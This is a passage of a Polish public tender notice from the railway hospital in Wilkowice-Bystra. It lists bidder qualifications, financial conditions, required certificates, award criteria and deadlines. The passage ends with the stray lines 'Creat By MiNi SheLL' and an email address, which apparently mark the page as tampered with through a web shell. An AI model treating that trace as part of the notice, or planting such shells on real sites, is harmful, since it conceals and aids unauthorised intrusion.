Obywatelom państw członkowskich Unii Europejskiej, których kwalifikacje zostały uznane, zapewnia się prawo wykonywania w Rzeczypospolitej Polskiej działalności na takich samych zasadach jak osobom, które kwalifikacje do ich wykonywania uzyskały w Rzeczypospolitej Polskiej. Regulację w tym zakresie stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn. Dz. U. z 2008, Nr 63, poz. 394 ze zm.).
Dla Części II
- 1 osobą, która pełnić będzie funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych 
- 1 osobą, posiadającą uprawnienia do prowadzenia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalnościach instalacyjnych w telekomunikacji 
Zamawiający dopuszcza połączenie funkcji poszczególnych osób pod warunkiem spełnienia przez osobę łączącą funkcje wszystkich warunków wymaganych dla tych funkcji.
Kierownik budowy, powinien posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 z późn. zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (j.t. Dz. U. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 

Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn. Dz. U. z 2008, Nr 63, poz. 394 ze zm.).

Obywatelom państw członkowskich Unii Europejskiej, których kwalifikacje zostały uznane, zapewnia się prawo wykonywania w Rzeczypospolitej Polskiej działalności na takich samych zasadach jak osobom, które kwalifikacje do ich wykonywania uzyskały w Rzeczypospolitej Polskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. części I
O zamówienie publiczne mogą ubiegać się Wykonawcy,
którzy znajdują się w sytuacji ekonomicznej i finansowej
zapewniającej wykonanie zamówienia - tj.
- posiadają opłacone ubezpieczenie od
odpowiedzialności cywilnej w zakresie prowadzonej
działalności związanej z przedmiotem zamówienia, na
kwotę nie mniejszą niż 250 tys. zł
- posiadają środki pieniężne lub zdolność kredytową na
kwotę nie mniejszą niż 250 tys. zł,
Dokumentami potwierdzającymi spełnianie w/w
warunku muszą być:
a) Opłacona polisa, a w przypadku jej braku, inny
dokument potwierdzający, że wykonawca jest
ubezpieczony od odpowiedzialności cywilnej w zakresie
prowadzonej działalności związanej z przedmiotem
zamówienia,
b) Informacja banku lub spółdzielczej kasy
oszczędnościowo-kredytowej potwierdzająca wysokość
posiadanych środków finansowych lub zdolność
kredytową wykonawcy, wystawiona nie wcześniej niż
3 miesiące przed upływem terminu składania ofert w
postępowaniu o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>c)	w sytuacji, gdy Wykonawca polega na osobach zdolnych do wykonania zamówieniu innych podmiotów, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia - należy dołączyć oryginał zobowiązania - jeśli dotyczy.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji/rękojmi za wady na przedmiot zamówienia - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-kolejowy.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ Szpital Kolejowy w Wilkowicach-Bystrej
ul. Żywiecka 19, 43-365 Wilkowice
Sekretariat Dyrektora.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2015 godzina 10:00, miejsce: SPZOZ Szpital Kolejowy w Wilkowicach-Bystrej
ul. Żywiecka 19, 43-365 Wilkowice
Sekretariat Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie dofinansowane jest ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013  Działanie 2.2   Rozwój elektronicznych usług publicznych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com